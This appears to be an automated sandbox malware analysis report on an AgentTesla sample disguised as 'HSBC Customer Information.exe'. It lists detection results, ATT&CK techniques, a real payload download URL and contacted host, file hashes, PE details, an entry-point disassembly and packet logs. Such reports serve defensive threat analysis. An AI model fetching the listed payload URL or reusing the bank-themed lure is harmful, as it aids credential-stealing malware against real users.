Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6140, type: MEMORYSTR

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6140, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	DLL Side-Loading1	Process Injection112	Disable or Modify Tools1	OS Credential Dumping	Security Software Discovery521	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Virtualization/Sandbox Evasion341	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection112	Security Account Manager	Virtualization/Sandbox Evasion341	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery214	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
HSBC Customer Information.exe	25%	Virustotal		Browse
HSBC Customer Information.exe	20%	ReversingLabs	Win32.Trojan.Mucc
HSBC Customer Information.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
https://qrextechnologies.com/barrr09_HVPbNJre68.bin	0%	Avira URL Cloud	safe
https://qrextechnologies.com/barrr09_HVPbNJre68.binwininet.dllMozilla/5.0	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://cthUYD.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
qrextechnologies.com	109.71.254.175	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://qrextechnologies.com/barrr09_HVPbNJre68.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://api.ipify.org%GETMozilla/5.0	RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	false	URL Reputation: safe	low
http://DynDns.comDynDNS	RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://qrextechnologies.com/barrr09_HVPbNJre68.binwininet.dllMozilla/5.0	RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://cthUYD.com	RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
109.71.254.175	qrextechnologies.com	Germany		207778	LINSERVERSNL	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	483511
Start date:	15.09.2021
Start time:	07:10:14
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	HSBC Customer Information.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@4/0@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 54.6% (good quality ratio 30.8%) Quality average: 31.7% Quality standard deviation: 33.8%
HCA Information:	Successful, ratio: 88% Number of executed functions: 13 Number of non-executed functions: 12
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 92.122.145.220, 23.35.236.56, 20.82.210.154, 40.112.88.60, 23.216.77.208, 23.216.77.209, 20.82.209.183, 20.54.110.249 Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:14:51	API Interceptor	149x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	4478884ce2cf578bf0a0d2484fc8221e5ff63d7cbc73d5200bacbd6e2796e017.exe	Get hash	malicious	Browse	109.71.254.175
	aZq3gco8Ab.exe	Get hash	malicious	Browse	109.71.254.175
	Medical-Engagement-Scale-Questionnaire.msi	Get hash	malicious	Browse	109.71.254.175
	setup_x86_x64_install.exe	Get hash	malicious	Browse	109.71.254.175
	CI and PL of CMZBD-210090.exe	Get hash	malicious	Browse	109.71.254.175
	Aplieco_6635.exe	Get hash	malicious	Browse	109.71.254.175
	egQIhpn3UW.exe	Get hash	malicious	Browse	109.71.254.175
	4J1sKiGm0T.exe	Get hash	malicious	Browse	109.71.254.175
	91a9d1482cacbe1adc5b23f56604b376860c13b69894164a9f79f9292d7f79b1.xls	Get hash	malicious	Browse	109.71.254.175
	#Ud83c#Udfb5mlavarnway_1250PM_ _3pm.html	Get hash	malicious	Browse	109.71.254.175
	lB2RFTpyni.exe	Get hash	malicious	Browse	109.71.254.175
	lgT2LzjZ6N.exe	Get hash	malicious	Browse	109.71.254.175
	ULTkbegFv8.exe	Get hash	malicious	Browse	109.71.254.175
	gmeqUPOV23.exe	Get hash	malicious	Browse	109.71.254.175
	tRMzIpPm2C.exe	Get hash	malicious	Browse	109.71.254.175
	H1zkKCLztq.exe	Get hash	malicious	Browse	109.71.254.175
	BqgOuMRaJ3.exe	Get hash	malicious	Browse	109.71.254.175
	image.exe	Get hash	malicious	Browse	109.71.254.175
	Pm2ZO9KH1V.exe	Get hash	malicious	Browse	109.71.254.175
	m1Bf7Ir6IB.exe	Get hash	malicious	Browse	109.71.254.175

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.225522855611587
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	HSBC Customer Information.exe
File size:	122880
MD5:	448f83467c61e465162daf7cf8d9e88f
SHA1:	c627061336905606c2c26b2b460ac4246fd54ca5
SHA256:	4773c7c5c52d0163bfa32cb271399692831e00ff7e6877f0877091e111c9f063
SHA512:	1f72e8cc6ec0c5d8f82a47ccd0e8dfa91bb9e7e90a00b34a6a466c8823579e58330f4c709ecb6c580814c3875bf618c1cbb7a5c83f70e8be08dbe46ca1a41fe3
SSDEEP:	1536:5EBupM4lApP843c9C72xMDqXq39T8g9AhfIRorEjc145:g4+p04s9iGMDfl0PrEw145
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L....=<O.....................@....................@................

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x4017ac
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4F3C3DB1 [Wed Feb 15 23:20:17 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	4d0b2c4c35fea49148bb1439759df35a

Entrypoint Preview

Instruction
push 0040C454h
call 00007FC36CB59335h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], ch
pop eax
stc
out dx, al
adc edx, dword ptr [ebx-56h]
dec eax
cdq
xor ah, byte ptr [edi]
js 00007FC36CB593C0h
push ds
inc ecx
mov ch, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [ebx], al
add eax, dword ptr [ecx]
add byte ptr [eax], al
add byte ptr [eax+6Ch], dl
jne 00007FC36CB593B5h
imul esi, dword ptr [ecx+ebp*2+63h], 736E6F63h
jne 00007FC36CB59342h
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
or al, 32h
dec esp
push es
sub edi, dword ptr [ebp-6BB60022h]
fadd qword ptr [edi-52h]
sbb al, 69h
mov ebp, 85D79967h
pop es
xor ah, byte ptr [edx-74CF43BCh]
cmpsb
bound esp, dword ptr [edi+4F3A8358h]
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
cmp al, ABh
add byte ptr [eax], al
dec esi
add byte ptr [eax], al
add byte ptr [eax], al
or al, byte ptr [eax]
dec esp
dec ecx
push esi
push ebx
push esp
inc ebp
inc edi
dec esi
inc ebp
push esp
add byte ptr [53000B01h], cl
outsd
insd
insd

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x19db4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1d000	0x16fe	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x14c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x192f0	0x1a000	False	0.427715594952	data	6.65061784926	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x1b000	0x119c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x1d000	0x16fe	0x2000	False	0.243530273438	data	2.90412945661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
CUSTOM	0x1de40	0x8be	MS Windows icon resource - 1 icon, 32x32, 11 bits/pixel	English	United States
CUSTOM	0x1db42	0x2fe	MS Windows icon resource - 1 icon, 32x32, 16 colors, 4 bits/pixel	English	United States
CUSTOM	0x1da04	0x13e	MS Windows icon resource - 1 icon, 16x16, 16 colors	English	United States
RT_ICON	0x1d8d4	0x130	data
RT_ICON	0x1d5ec	0x2e8	data
RT_ICON	0x1d4c4	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x1d494	0x30	data
RT_VERSION	0x1d200	0x294	data	Norwegian	Norway

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaErase, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaI2I4, DllFunctionCall, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, __vbaInStr, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaInStrB, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0414 0x04b0
InternalName	Blankningscu5
FileVersion	1.00
CompanyName	Asus
Comments	Thunderbird
ProductName	spicevpn.com
ProductVersion	1.00
FileDescription	Hp, Inc.
OriginalFilename	Blankningscu5.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Norwegian	Norway

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 15, 2021 07:14:39.267390013 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.267465115 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.267642975 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.299012899 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.299042940 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.375438929 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.375636101 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.730459929 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.730519056 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.731198072 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.731314898 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.734287977 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.765878916 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.765928984 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.766189098 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.766231060 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.766554117 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.797091007 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.797210932 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.797358036 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.797394037 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.797485113 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.797548056 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.828288078 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.828392982 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.828459024 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.828481913 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.828526974 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.828604937 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.828634977 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.828648090 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.828905106 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.829020977 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.829040051 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.829272032 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.829380035 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.829399109 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.829581976 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.829687119 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.829704046 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.829871893 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.829977989 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.829988956 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.830723047 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.862091064 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.862462044 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.862756968 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.862868071 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.862936020 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.863046885 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.863142967 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.863255978 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.863372087 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.863491058 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.863603115 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.863712072 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.863790035 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.863898993 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.863975048 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.864073992 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.864178896 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.864283085 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.864370108 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.864464998 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.864562035 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.864675045 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.864739895 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.864835024 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.895227909 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.895344019 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.895487070 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.895529985 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.895560026 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.895632029 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.895764112 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.895894051 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.895960093 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.896049023 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.896142006 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.896150112 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.896204948 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.896225929 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.896234035 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.896284103 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.897289038 CEST	49791	443	192.168.2.3	109.71.254.175
Sep 15, 2021 07:14:39.899893045 CEST	443	49791	109.71.254.175	192.168.2.3
Sep 15, 2021 07:14:39.900063038 CEST	49791	443	192.168.2.3	109.71.254.175

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 15, 2021 07:11:00.729901075 CEST	50620	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:11:00.766253948 CEST	53	50620	8.8.8.8	192.168.2.3
Sep 15, 2021 07:11:31.351835966 CEST	64938	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:11:31.400479078 CEST	53	64938	8.8.8.8	192.168.2.3
Sep 15, 2021 07:11:33.780060053 CEST	60152	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:11:33.825601101 CEST	53	60152	8.8.8.8	192.168.2.3
Sep 15, 2021 07:11:51.843823910 CEST	57544	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:11:51.885613918 CEST	53	57544	8.8.8.8	192.168.2.3
Sep 15, 2021 07:12:09.509416103 CEST	55984	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:12:09.545875072 CEST	53	55984	8.8.8.8	192.168.2.3
Sep 15, 2021 07:12:15.316302061 CEST	64185	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:12:15.352229118 CEST	53	64185	8.8.8.8	192.168.2.3
Sep 15, 2021 07:12:46.375292063 CEST	65110	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:12:46.410969019 CEST	53	65110	8.8.8.8	192.168.2.3
Sep 15, 2021 07:12:49.240334988 CEST	58361	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:12:49.284069061 CEST	53	58361	8.8.8.8	192.168.2.3
Sep 15, 2021 07:13:54.163676977 CEST	63492	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:13:54.213160992 CEST	53	63492	8.8.8.8	192.168.2.3
Sep 15, 2021 07:13:54.827075958 CEST	60831	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:13:54.910854101 CEST	53	60831	8.8.8.8	192.168.2.3
Sep 15, 2021 07:13:55.345204115 CEST	60100	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:13:55.373862028 CEST	53	60100	8.8.8.8	192.168.2.3
Sep 15, 2021 07:13:55.776545048 CEST	53195	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:13:55.847096920 CEST	53	53195	8.8.8.8	192.168.2.3
Sep 15, 2021 07:13:56.344090939 CEST	50141	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:13:56.373194933 CEST	53	50141	8.8.8.8	192.168.2.3
Sep 15, 2021 07:13:56.835848093 CEST	53023	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:13:56.872772932 CEST	53	53023	8.8.8.8	192.168.2.3
Sep 15, 2021 07:13:57.487806082 CEST	49563	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:13:57.570281029 CEST	53	49563	8.8.8.8	192.168.2.3
Sep 15, 2021 07:13:58.351824999 CEST	51352	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:13:58.388124943 CEST	53	51352	8.8.8.8	192.168.2.3
Sep 15, 2021 07:13:59.291834116 CEST	59349	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:13:59.319132090 CEST	53	59349	8.8.8.8	192.168.2.3
Sep 15, 2021 07:13:59.808149099 CEST	57084	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:13:59.835134983 CEST	53	57084	8.8.8.8	192.168.2.3
Sep 15, 2021 07:14:39.176923990 CEST	58823	53	192.168.2.3	8.8.8.8
Sep 15, 2021 07:14:39.218681097 CEST	53	58823	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 15, 2021 07:14:39.176923990 CEST	192.168.2.3	8.8.8.8	0x844c	Standard query (0)	qrextechnologies.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 15, 2021 07:14:39.218681097 CEST	8.8.8.8	192.168.2.3	0x844c	No error (0)	qrextechnologies.com		109.71.254.175	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

